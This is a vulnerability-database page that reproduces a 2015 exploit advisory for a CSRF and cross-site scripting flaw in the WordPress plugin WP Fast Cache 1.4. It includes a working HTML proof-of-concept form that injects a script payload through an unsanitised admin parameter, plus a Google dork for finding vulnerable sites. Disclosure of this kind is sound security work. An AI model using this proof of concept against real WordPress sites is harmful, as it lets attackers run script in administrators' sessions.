Lucene search
K

WordPress WP Fast Cache 1.4 CSRF / Cross Site Scripting

🗓️ 27 May 2015 00:00:00Reported by Claudio VivianiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

WP Fast Cache 1.4 is vulnerable to CSRF and XSS attacks against authenticated administrators.

Code
`  
######################  
  
# Exploit Title : WP Fast Cache 1.4 and below CSRF Stored/Reflected XSS  
  
# Exploit Author : Claudio Viviani  
  
# Website Author: http://www.homelab.it  
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)  
  
  
# Vendor Homepage : https://wordpress.org/plugins/wp-fast-cache/  
  
# Software Link : https://downloads.wordpress.org/plugin/wp-fast-cache.1.4.zip  
  
# Dork Google: index of wp-fast-cache  
  
# Date : 2015-05-11  
  
# Tested on : Windows 7 / Mozilla Firefox  
# Linux / Mozilla Firefox  
  
######################  
  
# Info:  
  
WP Fast Cache is vulnerable to CSRF attacks, which can also be combined with stored/reflected XSS attacks (authenticated administrators only).  
  
  
# PoC Exploit:  
  
<html>  
Click Here  
<form method="post" action="http://10.0.0.67/wordpress/wp-admin/admin.php?page=wp-fast-cache">  
  
<input type="hidden" name="wp_fast_cache_bulk_action" value="cache_this_url">  
<input type="hidden" name="wp_fast_cache_bulk_action_url" value="<script>alert(/XSS/)</script>">  
<input type="submit" name="submit" value="Submit">  
  
</form>  
</html>  
  
wp_fast_cache_bulk_action_url var was not sanitized!  
  
  
# PoC Video:  
  
http://youtu.be/Z7kV3aWE6mU  
  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)  
http://ffhd.homelab.it (Free Fuzzy Hashes Database)  
  
[email protected]  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
  
#####################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation